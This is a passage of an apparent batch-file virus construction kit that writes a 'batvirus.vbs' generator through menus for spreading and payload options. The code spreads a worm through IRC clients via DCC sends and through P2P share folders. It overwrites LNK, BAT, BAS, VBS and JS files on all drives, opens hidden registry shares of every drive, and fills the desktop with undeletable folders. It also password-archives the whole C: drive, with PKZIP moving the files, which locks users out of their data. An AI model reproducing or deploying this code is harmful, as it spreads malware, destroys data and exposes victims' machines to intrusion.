echo.b.Writeline "echo.n3=}>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline chr(37)&e&chr(37)&"mirc\script.ini >nul">>"batvirus.vbs
echo.b.Writeline chr(37)&e&chr(37)&"mirc32\script.ini >nul">>"batvirus.vbs
echo.b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"mirc\script.ini >nul">>batvirus.vbs
echo.b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"mirc32\script.ini >nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\system\"&c&"\"&c&".ini c:\mirc\script.ini >nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\system\"&c&"\"&c&".ini c:\mirc32\script.ini >nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"mirc\script.ini >nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"mirc32\script.ini >nul">>batvirus.vbs
echo.b.Writeline "echo.[Levels]>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.Enabled=1>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.Count=1>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.Level1="&c&">>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo."&c&"Enabled=1>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.["&c&"]>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.User1=*!*@*>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.UserCount=1>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.Event1=ON PART:#:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat "&Chr(124)&" /msg $nick WinUpdate>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.Event2=ON JOIN:#:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat "&Chr(124)&" /notice $nick Potential>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.Event3=ON TEXT:*fuck*:*:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.Event4=ON TEXT:*sex*:*:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.Event5=ON TEXT:*girl*:*:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline "echo.EventCount=5>>%%windir%%\system\"&c&"\"&c&".ini">>batvirus.vbs
echo.b.Writeline chr(37)&e&chr(37)&"pirch\events.ini >nul">>batvirus.vbs
echo.b.Writeline chr(37)&e&chr(37)&"pirch98\events.ini >nul">>batvirus.vbs
echo.b.Writeline chr(37)&e&chr(37)&"pirch32\events.ini >nul">>batvirus.vbs
echo.b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pirch\events.ini >nul">>batvirus.vbs
echo.b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pirch98\events.ini >nul">>batvirus.vbs
echo.b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pirch32\events.ini >nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\system\"&c&"\"&c&".ini c:\pirch\events.ini >nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\system\"&c&"\"&c&".ini c:\pirch98\events.ini >nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\system\"&c&"\"&c&".ini c:\pirch32\events.ini >nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"pirch\events.ini >nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"pirch98\events.ini >nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"pirch32\events.ini >nul">>batvirus.vbs
echo.b.Writeline "echo.set z=CreateObject("&Chr(34)&"wscript.shell"&Chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.z.regwrite "&Chr(34)&"HKEY_USERS\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17"&Chr(34)&","&Chr(34)&"dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "cscript %%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
ctty con

:007
cls
echo.
echo.
echo.
echo        P2P worm
echo        ÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Spread via p2p
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if errorlevel 3 goto done
if errorlevel 2 goto 008
if errorlevel 1 goto a14
goto done

:a14
cls
ctty nul
echo.b.Writeline "copy %%0 c:\download\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\kazaa\myshar~1\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\mydown~1\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\mydocu~1\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&%&g&%&"applej~1\incoming\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&%&g&%&"bearsh~1\shared\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&%&g&%&"edonke~1\incoming\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&%&g&%&"emule\incoming\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&%&g&%&"grokster\mygrok~1\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&%&g&%&"icq\shared~1\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&%&g&%&"kazaa\myshar~1\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&%&g&%&"kazaal~1\myshar~1\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&%&g&%&"kmd\myshar~1\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&%&g&%&"limewire\shared\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&%&g&%&"morpheus\myshar~1\"&c&".bat >nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\"&%&g&%&"overnet\bundles\"&c&".bat >nul">>batvirus.vbs
ctty con

:008
cls
echo.
echo.
echo.
echo        LNK droping
echo        ÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Spread via lnk files
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if errorlevel 3 goto done
if errorlevel 2 goto 009
if errorlevel 1 goto a15
goto done

:a15
cls
ctty nul
echo.b.Writeline "echo.set a=Wscript.CreateObject("&Chr(34)&"WScript.Shell"&Chr(34)&")>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.set b=a.CreateShortcut("&Chr(34)&"%windir%\system\"&c&"\"&c&".lnk"&Chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.TargetPath=a.ExpandEnvironmentStrings("&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.WindowStyle=4>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Save>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "cscript %%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "for %%%%b in (c:\*.lnk *.lnk ..\*.lnk c:\mydocu~1\*.lnk %%windir%%\*.lnk %%path%%\*.lnk %%windir%%\desktop\*.lnk %%windir%%\system\*.lnk) do attrib -r -h -s -a %%%%b">>batvirus.vbs
echo.b.Writeline "for %%%%b in (c:\*.lnk *.lnk ..\*.lnk c:\mydocu~1\*.lnk %%windir%%\*.lnk %%path%%\*.lnk %%windir%%\desktop\*.lnk %%windir%%\system\*.lnk) do copy %%windir%%\system\"&c&"\"&c&".lnk %%%%b /y">>batvirus.vbs
echo.b.Writeline "for %%%%b in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%b:\nul copy %%windir%%\"&c&"\"&c&".lnk %%%%b:\funny.lnk /y">>batvirus.vbs
ctty con

:009
cls
echo.
echo.
echo.
echo        BAT infection
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Spread via bat files
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if errorlevel 3 goto done
if errorlevel 2 goto 010
if errorlevel 1 goto a16
goto done

:a16
cls
ctty nul
echo.b.Writeline "for %%%%c in (*.bat ..\*.bat c:\mydocu~1\*.bat %%windir%%\*.bat %%path%%\*.bat %%windir%%\desktop\*.bat %%windir%%\command\ebd\*.bat %%windir%%\system\*.bat) do attrib -r -h -s -a %%%%c">>batvirus.vbs
echo.b.Writeline "for %%%%c in (*.bat ..\*.bat c:\mydocu~1\*.bat %%windir%%\*.bat %%path%%\*.bat %%windir%%\desktop\*.bat %%windir%%\command\ebd\*.bat %%windir%%\system\*.bat) do copy %%windir%%\system\"&c&"\tmpdelis.bat %%%%c /y">>batvirus.vbs
echo.b.Writeline "for %%%%c in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%c:\nul copy %%windir%%\system\"&c&"\tmpdelis.bat %%%%c:\_tmpcfg.bat /y">>batvirus.vbs
ctty con

:010
cls
echo.
echo.
echo.
echo        BAS (Quick Basic) droping
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Spread via bas files
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if errorlevel 3 goto done
if errorlevel 2 goto 011
if errorlevel 1 goto a17
goto done

:a17
cls
ctty nul
echo.b.Writeline "echo.SHELL "&Chr(34)&"%%windir%%\system\"&c&"\tmpdelis.bat"&Chr(34)&">%%windir%%\system\"&c&"\"&c&".bas">>batvirus.vbs
echo.b.Writeline "echo.END>>%%windir%%\system\"&c&"\"&c&".bas">>batvirus.vbs
echo.b.Writeline "for %%%%d in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %%windir%%\*.bas %%path%%\*.bas %%windir%%\desktop\*.bas %%windir%%\system\*.bas) do attrib -r -h -s -a %%%%d">>batvirus.vbs
echo.b.Writeline "for %%%%d in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %%windir%%\*.bas %%path%%\*.bas %%windir%%\desktop\*.bas %%windir%%\system\*.bas) do copy %%windir%%\system\"&c&"\"&c&".bas %%%%d /y">>batvirus.vbs
echo.b.Writeline "for %%%%d in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%d:\nul copy %%windir%%\system\"&c&"\"&c&".bas %%%%d:\tmp_.bas /y">>batvirus.vbs
ctty con

:011
cls
echo.
echo.
echo.
echo        VBS & JS droping       
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Spread via vbs & js files
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if errorlevel 3 goto done
if errorlevel 2 goto 012
if errorlevel 1 goto a18
goto done

:a18
cls
ctty nul
echo.b.Writeline "echo.set a=wscript.createobject("&Chr(34)&"wscript.shell"&Chr(34)&")>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.a.run "&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&", VBHide>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "for %%%%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %%windir%%\*.vb* %%path%%\*.vb* %%windir%%\desktop\*.vb* %%windir%%\system\*.vb*) do attrib -r -h -s -a %%%%e">>batvirus.vbs
echo.b.Writeline "for %%%%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %%windir%%\*.vb* %%path%%\*.vb* %%windir%%\desktop\*.vb* %%windir%%\system\*.vb*) do copy %%windir%%\system\"&c&"\"&c&".vbs %%%%e /y">>batvirus.vbs
echo.b.Writeline "for %%%%e in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%e:\nul copy %%windir%%\system\"&c&"\"&c&".vbs %%%%e:\tmp_.vbs /y">>batvirus.vbs
echo.b.Writeline "echo.a=wscript.createobject("&Chr(34)&"wscript.shell"&Chr(34)&");>%%windir%%\system\"&c&"\"&c&".js">>batvirus.vbs
echo.b.Writeline "echo.a.Run("&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&");>>%%windir%%\system\"&c&"\"&c&".js">>batvirus.vbs
echo.b.Writeline "for %%%%f in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %%windir%%\*.js* %%path%%\*.js* %%windir%%\desktop\*.js* %%windir%%\system\*.js*) do attrib -r -h -s -a %%%%f">>batvirus.vbs
echo.b.Writeline "for %%%%f in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %%windir%%\*.js* %%path%%\*.js* %%windir%%\desktop\*.js* %%windir%%\system\*.js*) do copy %%windir%%\system\"&c&"\"&c&".js %%%%f /y">>batvirus.vbs
echo.b.Writeline "for %%%%f in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%f:\nul copy %%windir%%\system\"&c&"\"&c&".js %%%%f:\tmp_.js /y">>batvirus.vbs
ctty con

:012
cls
echo.
echo.
echo.
echo        Hidden Sharing
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Enable hidden sharing on all drives
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if errorlevel 3 goto done
if errorlevel 2 goto 013
if errorlevel 1 goto a19
goto done

:a19
cls
ctty nul
echo.b.Writeline "echo.REGEDIT4>%%windir%%\system\"&c&"\"&c&".reg">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\system\"&c&"\"&c&".reg">>batvirus.vbs
echo.b.Writeline "echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan]>>%%windir%%\system\"&c&"\"&c&".reg">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\system\"&c&"\"&c&".reg">>batvirus.vbs
echo.b.Writeline "echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\"&Chr(37)&Chr(37)&"1$]>>%%windir%%\system\"&c&"\"&c&".reg">>batvirus.vbs
echo.b.Writeline "echo."&Chr(34)&"Flags"&Chr(34)&"=dword:00000302>>%%windir%%\system\"&c&"\"&c&".reg">>batvirus.vbs
echo.b.Writeline "echo."&Chr(34)&"Parm1enc"&Chr(34)&"=hex:>>%%windir%%\system\"&c&"\"&c&".reg">>batvirus.vbs
echo.b.Writeline "echo."&Chr(34)&"Parm2enc"&Chr(34)&"=hex:>>%%windir%%\system\"&c&"\"&c&".reg">>batvirus.vbs
echo.b.Writeline "echo."&Chr(34)&"Path"&Chr(34)&"="&Chr(34)&Chr(37)&Chr(37)&"1:\\"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>batvirus.vbs
echo.b.Writeline "echo."&Chr(34)&"Remark"&Chr(34)&"="&Chr(34)&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>batvirus.vbs
echo.b.Writeline "echo."&Chr(34)&"Type"&Chr(34)&"=dword:00000000>>%%windir%%\system\"&c&"\"&c&".reg">>batvirus.vbs
echo.b.Writeline "for %%%%g in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;t;s;t;u;v;w;x;y;z;a) do start regedit /s %%windir%%\system\"&c&"\"&c&".reg %%%%g>nul">>batvirus.vbs
ctty con

:013
cls
echo.
echo.
echo.
echo        Desktop payload
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Fill desktop with undeleatable folders
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if errorlevel 3 goto done
if errorlevel 2 goto 014
if errorlevel 1 goto a20
goto done

:a20
cls
ctty nul
echo.i="">>batvirus.vbs
echo.j=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To j>>batvirus.vbs
echo.i=i&chr(int(rnd(1)*120)+120)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "set "&i&"=md %%windir%%\desktop\">>batvirus.vbs
echo.b.Writeline %&i&%&i&"00 "&>&"nul "&|&" "&%&i&%&i&"01 "&>&"nul "&|&" "&%&i&%&i&"02 "&>&"nul "&|&" "&%&i&%&i&"03 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"04 "&>&"nul "&|&" "&%&i&%&i&"05 "&>&"nul "&|&" "&%&i&%&i&"06 "&>&"nul "&|&" "&%&i&%&i&"07 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"08 "&>&"nul "&|&" "&%&i&%&i&"09 "&>&"nul "&|&" "&%&i&%&i&"10 "&>&"nul "&|&" "&%&i&%&i&"11 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"12 "&>&"nul "&|&" "&%&i&%&i&"13 "&>&"nul "&|&" "&%&i&%&i&"14 "&>&"nul "&|&" "&%&i&%&i&"15 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"16 "&>&"nul "&|&" "&%&i&%&i&"17 "&>&"nul "&|&" "&%&i&%&i&"18 "&>&"nul "&|&" "&%&i&%&i&"19 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"20 "&>&"nul "&|&" "&%&i&%&i&"21 "&>&"nul "&|&" "&%&i&%&i&"22 "&>&"nul "&|&" "&%&i&%&i&"23 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"24 "&>&"nul "&|&" "&%&i&%&i&"25 "&>&"nul "&|&" "&%&i&%&i&"26 "&>&"nul "&|&" "&%&i&%&i&"27 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"28 "&>&"nul "&|&" "&%&i&%&i&"29 "&>&"nul "&|&" "&%&i&%&i&"30 "&>&"nul "&|&" "&%&i&%&i&"31 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"32 "&>&"nul "&|&" "&%&i&%&i&"33 "&>&"nul "&|&" "&%&i&%&i&"34 "&>&"nul "&|&" "&%&i&%&i&"35 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"36 "&>&"nul "&|&" "&%&i&%&i&"37 "&>&"nul "&|&" "&%&i&%&i&"38 "&>&"nul "&|&" "&%&i&%&i&"39 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"40 "&>&"nul "&|&" "&%&i&%&i&"41 "&>&"nul "&|&" "&%&i&%&i&"42 "&>&"nul "&|&" "&%&i&%&i&"43 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"44 "&>&"nul "&|&" "&%&i&%&i&"45 "&>&"nul "&|&" "&%&i&%&i&"46 "&>&"nul "&|&" "&%&i&%&i&"47 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"48 "&>&"nul "&|&" "&%&i&%&i&"49 "&>&"nul "&|&" "&%&i&%&i&"50 "&>&"nul "&|&" "&%&i&%&i&"51 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"52 "&>&"nul "&|&" "&%&i&%&i&"53 "&>&"nul "&|&" "&%&i&%&i&"54 "&>&"nul "&|&" "&%&i&%&i&"55 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"56 "&>&"nul "&|&" "&%&i&%&i&"57 "&>&"nul "&|&" "&%&i&%&i&"58 "&>&"nul "&|&" "&%&i&%&i&"59 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"60 "&>&"nul "&|&" "&%&i&%&i&"61 "&>&"nul "&|&" "&%&i&%&i&"62 "&>&"nul "&|&" "&%&i&%&i&"63 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"64 "&>&"nul "&|&" "&%&i&%&i&"65 "&>&"nul "&|&" "&%&i&%&i&"66 "&>&"nul "&|&" "&%&i&%&i&"67 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"68 "&>&"nul "&|&" "&%&i&%&i&"69 "&>&"nul "&|&" "&%&i&%&i&"70 "&>&"nul "&|&" "&%&i&%&i&"71 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"72 "&>&"nul "&|&" "&%&i&%&i&"73 "&>&"nul "&|&" "&%&i&%&i&"74 "&>&"nul "&|&" "&%&i&%&i&"75 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"76 "&>&"nul "&|&" "&%&i&%&i&"77 "&>&"nul "&|&" "&%&i&%&i&"78 "&>&"nul "&|&" "&%&i&%&i&"79 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"80 "&>&"nul "&|&" "&%&i&%&i&"81 "&>&"nul "&|&" "&%&i&%&i&"82 "&>&"nul "&|&" "&%&i&%&i&"83 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"84 "&>&"nul "&|&" "&%&i&%&i&"85 "&>&"nul "&|&" "&%&i&%&i&"86 "&>&"nul "&|&" "&%&i&%&i&"87 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"88 "&>&"nul "&|&" "&%&i&%&i&"89 "&>&"nul "&|&" "&%&i&%&i&"90 "&>&"nul "&|&" "&%&i&%&i&"91 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"92 "&>&"nul "&|&" "&%&i&%&i&"93 "&>&"nul "&|&" "&%&i&%&i&"94 "&>&"nul "&|&" "&%&i&%&i&"95 "&>&"nul">>batvirus.vbs
echo.b.Writeline %&i&%&i&"96 "&>&"nul "&|&" "&%&i&%&i&"97 "&>&"nul "&|&" "&%&i&%&i&"98 "&>&"nul "&|&" "&%&i&%&i&"99 "&>&"nul">>batvirus.vbs
echo.b.Writeline "for %%%%h in (%%windir%%\desktop\"&i&"*) do attrib +r +h +s +a %%%%h">>batvirus.vbs
ctty con

:014
cls
echo.
echo.
echo.
echo        RAR, ZIP & ARJ payloads
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - WinRAR password payload
echo    2 - PkZIP password payload
echo    3 - WinARJ password payload
echo.
echo    4 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:1234Q>nul
if errorlevel 5 goto done
if errorlevel 4 goto 015
if errorlevel 3 goto a23
if errorlevel 2 goto a22
if errorlevel 1 goto a21
goto done

:a21
cls
ctty nul
echo.b.Writeline "echo.Randomize>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.Set a=CreateObject("&"&"scripting.filesystemobject"&"&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.c=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.d=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.Set b=a.CreateTextFile (d&"&"&".bat"&"&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.Set f=CreateObject("&"&"WScript.Shell"&"&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.e=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"ctty nul"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"if not exist c:\"&%&g&%&"winrar\rar.exe goto end"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"c:\"&%&g&%&"winrar\rar.exe a -p"&"&"&c&"&"&" -r -m5 -o+ -inul -idp -y "&"&"&e&"&"&".rar c:\*.* "&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"ctty con"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&":end"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"cls"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Close>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.f.Run "&"d"&Chr(38)&"&".bat"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "cscript %%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
ctty con
goto 015

:a22
cls
ctty nul
echo.b.Writeline "echo.Randomize>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.Set a=CreateObject("&"&"scripting.filesystemobject"&"&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.c=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.d=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.Set b=a.CreateTextFile (d&"&"&".bat"&"&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.Set f=CreateObject("&"&"WScript.Shell"&"&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.e=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"ctty nul"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"if not exist c:\"&%&g&%&"pkware\pkzipc\pkzipc.exe goto end"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"c:\"&%&g&%&"pkware\pkzipc\pkzipc.exe -add -attr=all -lev=9 -move -dir=root -pass="&"&"&c&"&"&" "&"&"&e&"&"&".zip c:\*.*"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"ctty con"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&":end"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"cls"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Close>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.f.Run "&"d"&Chr(38)&"&".bat"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "cscript %%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
ctty con
goto 015

:a23
cls
ctty nul
echo.b.Writeline "echo.Randomize>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.Set a=CreateObject("&"&"scripting.filesystemobject"&"&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.c=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.d=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
